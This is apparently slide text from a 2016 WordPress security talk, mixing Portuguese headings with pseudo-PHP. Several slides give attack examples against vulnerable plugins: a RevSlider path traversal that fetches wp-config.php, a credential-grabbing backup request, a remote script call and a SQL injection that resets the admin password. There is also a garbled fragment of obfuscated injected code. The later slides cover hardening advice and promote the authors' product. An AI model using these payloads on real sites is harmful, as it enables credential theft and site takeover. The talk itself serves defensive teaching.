  • 12. /* Site comprometido por um plugin */ // MOST COMMON METHOD $using_method =“Local File Inclusion (LFI) attack.”; // EXAMPLE - INJECTED CODE <?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"} ["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"} ["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g x78x67ycx74x71x73"]="tx69tlx65"; ?>
  • 13. /* Site comprometido por um plugin */ // EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER $wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php”); /* Source: http://finalphoenix.me/ */
  • 14. /* Site comprometido por um plugin */ // EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR UPLOADING FILES $nonce = file_get_contents(“http://victim.com/wp-admin/admin.php? action=upgrade-plugin”);
 $credentials = file_get_contents(“http://victim.com/wp-admin/admin.php? action=updraft_ajax_handler&nonce=$nonce”); /* Source: http://finalphoenix.me/ */
  • 15. /* Site comprometido por um plugin */ // EXAMPLE - EXECUTING SCRIPTS $script_to_execute =“phpinfo()”;
 $content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/ admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl= $script_to_execute”); /* Source: http://finalphoenix.me/ */
  • 16. /* Site comprometido por um plugin */ // EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION) $context = … $query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
 $chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php? page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context); /* Source: http://finalphoenix.me/ */
  • 17. /* Site comprometido por um plugin */ // HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS? $simple_solution =“update, update, update!”; $other_tips = array (“dont use old plugins”,“search for news about security issues”,“take a look at the code”);
  • 18. /* Site comprometido por brute force */ // PASSWORD GUESSING ATTACK $tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin account”);
 $how_to_avoid =“two factor authentication”; $other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than x times”);
  • 19. /* Site comprometido por outros motivos */ // SET THE CORRECT PERMISSIONS $folders =“0755”; $files =“0644”; $wp_config =“0444”; $htaccess =“0444”;
  • 20. /* Site comprometido por outros motivos */ // SET THE CORRECT .HTACCESS CONTENT $things_you_can_do = array(“block IPs”,“protect files”,“allow certain file extensions from wp_content/*”);
  • 21. /* Site comprometido por outros motivos */ // HAVE LATEST OS UPDATES INSTALLED if ($i_have_a_server() == true) { update_os(); }
  • 22. /* Atualizar, sempre! */ // UPDATE PLUGINS, UPDATE CORE INSTALATION, UPDATE THEMES $always_update = true;
  • 23. /* Plugins que ajudam */ // SECURITY PLUGINS
 install_plugin_by_slug(‘wordfence’); install_plugin_by_slug(‘sucuri-scanner’); install_plugin_by_slug(‘better-wp-security’); // iThemes Security install_plugin_by_slug(‘google-authenticator’);
  • 24. /* A nossa solução, aberta para todos */ // OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION $new_approach = install_hellosys();
  • 25. // MOBILE APP $name =“HELLOSYS”
  • 26. /* A nossa solução, aberta para todos */ // ENTER BETA, STAY TUNED $url =“http://hellodev.us”;
  • 27. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:20:00’; thank_you(); /* Fim */